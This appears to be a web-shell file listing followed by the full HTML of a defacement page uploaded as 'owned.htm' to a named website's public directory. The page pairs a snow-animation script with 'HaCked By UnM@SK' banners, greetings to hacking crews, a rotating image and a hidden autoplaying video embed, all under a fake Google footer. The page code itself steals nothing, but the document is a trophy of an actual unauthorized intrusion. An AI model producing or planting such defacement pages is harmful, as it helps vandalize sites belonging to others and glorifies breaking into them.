GOOGLE

aku nok ndi : /home/astwardha/public_html/astwardha/astwardha.in/
File Up :
aku nok ndi : /home/astwardha/public_html/astwardha/astwardha.in/owned.htm

<html><head><title>HaCked By UnM@SK</title>
<script type="text/javascript">

var snowmax=35
var snowcolor=new Array("#AAAACC","#DDDDFF","#CCCCDD","#F3F3F3","#F0FFFF")
var snowtype=new Array("Arial Black","Arial Narrow","Times","Comic Sans MS")
var snowletter="*"
var sinkspeed=0.6
var snowmaxsize=22
var snowminsize=8
var snowingzone=1

// Do not edit below this line
var snow=new Array()
var marginbottom
var marginright
var timer
var i_snow=0
var x_mv=new Array();
var crds=new Array();
var lftrght=new Array();
var browserinfos=navigator.userAgent 
var ie5=document.all&&document.getElementById&&!browserinfos.match(/Opera/)
var ns6=document.getElementById&&!document.all
var opera=browserinfos.match(/Opera/)  
var browserok=ie5||ns6||opera

function randommaker(range) {		
	rand=Math.floor(range*Math.random())
    return rand
}

function initsnow() {
	if (ie5 || opera) {
		marginbottom = document.body.clientHeight
		marginright = document.body.clientWidth
	}
	else if (ns6) {
		marginbottom = window.innerHeight
		marginright = window.innerWidth
	}
	var snowsizerange=snowmaxsize-snowminsize
	for (i=0;i<=snowmax;i++) {
		crds[i] = 0;                      
    	lftrght[i] = Math.random()*15;         
    	x_mv[i] = 0.03 + Math.random()/10;
		snow[i]=document.getElementById("s"+i)
		snow[i].style.fontFamily=snowtype[randommaker(snowtype.length)]
		snow[i].size=randommaker(snowsizerange)+snowminsize
		snow[i].style.fontSize=snow[i].size
		snow[i].style.color=snowcolor[randommaker(snowcolor.length)]
		snow[i].sink=sinkspeed*snow[i].size/5
		if (snowingzone==1) {snow[i].posx=randommaker(marginright-snow[i].size)}
		if (snowingzone==2) {snow[i].posx=randommaker(marginright/2-snow[i].size)}
		if (snowingzone==3) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/4}
		if (snowingzone==4) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/2}
		snow[i].posy=randommaker(2*marginbottom-marginbottom-2*snow[i].size)
		snow[i].style.left=snow[i].posx
		snow[i].style.top=snow[i].posy
	}
	movesnow()
}

function movesnow() {
	for (i=0;i<=snowmax;i++) {
		crds[i] += x_mv[i];
		snow[i].posy+=snow[i].sink
		snow[i].style.left=snow[i].posx+lftrght[i]*Math.sin(crds[i]);
		snow[i].style.top=snow[i].posy
		
		if (snow[i].posy>=marginbottom-2*snow[i].size || parseInt(snow[i].style.left)>(marginright-3*lftrght[i])){
			if (snowingzone==1) {snow[i].posx=randommaker(marginright-snow[i].size)}
			if (snowingzone==2) {snow[i].posx=randommaker(marginright/2-snow[i].size)}
			if (snowingzone==3) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/4}
			if (snowingzone==4) {snow[i].posx=randommaker(marginright/2-snow[i].size)+marginright/2}
			snow[i].posy=0
		}
	}
	var timer=setTimeout("movesnow()",50)
}

for (i=0;i<=snowmax;i++) {
	document.write("<span id='s"+i+"' style='position:absolute;top:-"+snowmaxsize+"'>"+snowletter+"</span>")
}
if (browserok) {
	window.onload=initsnow
}
</script></head><body><span id="s0" style="position: absolute; top: 571.2px; font-family: Comic Sans MS; font-size: 8px; color: rgb(204, 204, 221); left: 262.614px;">*</span><span id="s1" style="position: absolute; top: 257.4px; font-family: Arial Black; font-size: 21px; color: rgb(170, 170, 204); left: 1226.8px;">*</span><span id="s2" style="position: absolute; top: 602.2px; font-family: Arial Narrow; font-size: 8px; color: rgb(240, 255, 255); left: 124.189px;">*</span><span id="s3" style="position: absolute; top: 159.4px; font-family: Arial Black; font-size: 11px; color: rgb(243, 243, 243); left: 1058.95px;">*</span><span id="s4" style="position: absolute; top: 379.6px; font-family: Comic Sans MS; font-size: 9px; color: rgb(170, 170, 204); left: 197.196px;">*</span><span id="s5" style="position: absolute; top: 410.2px; font-family: Arial Black; font-size: 8px; color: rgb(221, 221, 255); left: 1006.62px;">*</span><span id="s6" style="position: absolute; top: 625.2px; font-family: Arial Black; font-size: 8px; color: rgb(240, 255, 255); left: 699.44px;">*</span><span id="s7" style="position: absolute; top: 49.2px; font-family: Arial Black; font-size: 10px; color: rgb(243, 243, 243); left: 948.182px;">*</span><span id="s8" style="position: absolute; top: 25.92px; font-family: Times; font-size: 12px; color: rgb(170, 170, 204); left: 1050.77px;">*</span><span id="s9" style="position: absolute; top: 116.16px; font-family: Arial Narrow; font-size: 11px; color: rgb(240, 255, 255); left: 657.38px;">*</span><span id="s10" style="position: absolute; top: 265.4px; font-family: Comic Sans MS; font-size: 11px; color: rgb(240, 255, 255); left: 36.0285px;">*</span><span id="s11" style="position: absolute; top: 319px; font-family: Times; font-size: 10px; color: rgb(243, 243, 243); left: 1283.14px;">*</span><span id="s12" style="position: absolute; top: 392.4px; font-family: Arial Narrow; font-size: 11px; color: rgb(170, 170, 204); left: 490.475px;">*</span><span id="s13" style="position: absolute; top: 464.6px; font-family: Comic Sans MS; font-size: 19px; color: rgb(204, 204, 221); left: 3.99581px;">*</span><span id="s14" style="position: absolute; top: 166.44px; font-family: Comic Sans MS; font-size: 19px; color: rgb(243, 243, 243); left: 740.539px;">*</span><span id="s15" style="position: absolute; top: 538.4px; font-family: Arial Black; font-size: 21px; color: rgb(243, 243, 243); left: 723.25px;">*</span><span id="s16" style="position: absolute; top: 453.4px; font-family: Arial Narrow; font-size: 11px; color: rgb(204, 204, 221); left: 410.922px;">*</span><span id="s17" style="position: absolute; top: 391px; font-family: Comic Sans MS; font-size: 10px; color: rgb(204, 204, 221); left: 966.562px;">*</span><span id="s18" style="position: absolute; top: 162px; font-family: Comic Sans MS; font-size: 18px; color: rgb(170, 170, 204); left: 579.411px;">*</span><span id="s19" style="position: absolute; top: 410.8px; font-family: Times; font-size: 12px; color: rgb(240, 255, 255); left: 927.607px;">*</span><span id="s20" style="position: absolute; top: 625.6px; font-family: Times; font-size: 9px; color: rgb(240, 255, 255); left: 677.795px;">*</span><span id="s21" style="position: absolute; top: 436.8px; font-family: Arial Narrow; font-size: 17px; color: rgb(170, 170, 204); left: 1008.15px;">*</span><span id="s22" style="position: absolute; top: 75.6px; font-family: Arial Black; font-size: 21px; color: rgb(170, 170, 204); left: 449.998px;">*</span><span id="s23" style="position: absolute; top: 563.2px; font-family: Arial Narrow; font-size: 13px; color: rgb(204, 204, 221); left: 346.726px;">*</span><span id="s24" style="position: absolute; top: 586px; font-family: Comic Sans MS; font-size: 10px; color: rgb(243, 243, 243); left: 929.217px;">*</span><span id="s25" style="position: absolute; top: 463px; font-family: Comic Sans MS; font-size: 20px; color: rgb(240, 255, 255); left: 991.666px;">*</span><span id="s26" style="position: absolute; top: 64.8px; font-family: Times; font-size: 20px; color: rgb(243, 243, 243); left: 241.454px;">*</span><span id="s27" style="position: absolute; top: 560px; font-family: Comic Sans MS; font-size: 20px; color: rgb(221, 221, 255); left: 236.487px;">*</span><span id="s28" style="position: absolute; top: 128.52px; font-family: Arial Narrow; font-size: 17px; color: rgb(204, 204, 221); left: 851.87px;">*</span><span id="s29" style="position: absolute; top: 59.28px; font-family: Arial Black; font-size: 19px; color: rgb(243, 243, 243); left: 135.894px;">*</span><span id="s30" style="position: absolute; top: 117.6px; font-family: Times; font-size: 20px; color: rgb(240, 255, 255); left: 686.34px;">*</span><span id="s31" style="position: absolute; top: 166.44px; font-family: Arial Black; font-size: 19px; color: rgb(204, 204, 221); left: 367.072px;">*</span><span id="s32" style="position: absolute; top: 192.6px; font-family: Times; font-size: 14px; color: rgb(240, 255, 255); left: 474.101px;">*</span><span id="s33" style="position: absolute; top: 126.72px; font-family: Arial Black; font-size: 16px; color: rgb(243, 243, 243); left: 304.577px;">*</span><span id="s34" style="position: absolute; top: 417.6px; font-family: Arial Narrow; font-size: 14px; color: rgb(240, 255, 255); left: 156.098px;">*</span><span id="s35" style="position: absolute; top: 15.12px; font-family: Times; font-size: 9px; color: rgb(170, 170, 204); left: 825.26px;">*</span>

<style type="text/css">
	body {background-color:#000000;}
	#q {font: 40px impact;color:#ffffff;}
</style>
<table width="100%" height="43%">
	<tbody><tr><td align="center">
	<center>
   <style type="text/css"> body { font-family: 'Jolly Lodger'; color: white; padding: 0; margin: 0; background-image: url(''); background-repeat:no-repeat; background-position:center; background-size: 100% 100%; } .GopressXploits_Blink { -webkit-animation-name: blinker; -webkit-animation-duration: 2s; -webkit-animation-timing-function: linear; -webkit-animation-iteration-count: infinite; -moz-animation-name: blinker; -moz-animation-duration: 1s; -moz-animation-timing-function: linear; -moz-animation-iteration-count: infinite; animation-name: blinker; animation-duration: 1s; animation-timing-function: linear; animation-iteration-count: infinite; color: red; } @-moz-keyframes blinker { 0% { opacity: 1.0; } 50% { opacity: 0.0; } 100% { opacity: 1.0; } } @-webkit-keyframes blinker { 0% { opacity: 1.0; } 50% { opacity: 0.0; } 100% { opacity: 1.0; } } @keyframes blinker { 0% { opacity: 1.0; } 50% { opacity: 0.0; } 100% { opacity: 1.0; } } img { opacity: 0.8; } img { animation-name: rotate ; animation-duration: 5s; animation-play-state: running; animation-timing-function: linear; animation-iteration-count: infinite; opacity: 1.0; filter: alpha(opacity=50); } img:hover { opacity: 1.0;filter: alpha(opacity=100); } @keyframes rotate{ 10% {transform:rotateY(36deg)} 20% {transform:rotateY(72deg)} 30% {transform:rotateY(108deg)} 40% {transform:rotateY(144deg)} 50% {transform:rotateY(180deg)} 60% {transform:rotateY(216deg)} 70% {transform:rotateY(252deg)} 80% {transform:rotateY(288deg)} 90% {transform:rotateY(324deg)} 100% {transform:rotateY(360deg)} } </style>
   <style> img { opacity: 0.5; filter: alpha(opacity=50); /* For IE8 and earlier */ } img:hover { opacity: 1.0; filter: alpha(opacity=100); /* For IE8 and earlier */ } </style>
   <br>
   <img style="width:450px;" src="https://scontent.fcgk13-1.fna.fbcdn.net/v/t1.15752-9/48390143_360971501128795_8400900196401152_n.jpg?_nc_cat=108&_nc_ht=scontent.fcgk13-1.fna&oh=5be7bde03b175f50ad9bf3890b548c79&oe=5C9EDD31">
   <br>		<div id="q">HaCked By UnM@SK</div>
		<div id="q">SilentClown Here</div>
		<div id="q">UnM@SK-Developer_Kamikaze-Mr.onion-./Irvn-F4U24N-IdiotPeople</div>
		<div id="q">|Greetz|</div>
		<div id="q">Ghost Hunter Ilusion - Dark Side Team - TEH Squad Cyber - SilentClown - Explosion Squad Cyber - Indoxploit</div>
	</td>
</tr></tbody></table>
<!---End Background--->
<embed src="https://www.youtube.com/v/7wtfhZwyrcc&amp;autoplay=1" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1">
</strong></span></center></center></td></tr></tbody></table></body></html>

Copyright © 1945 - 2024 GOOGLE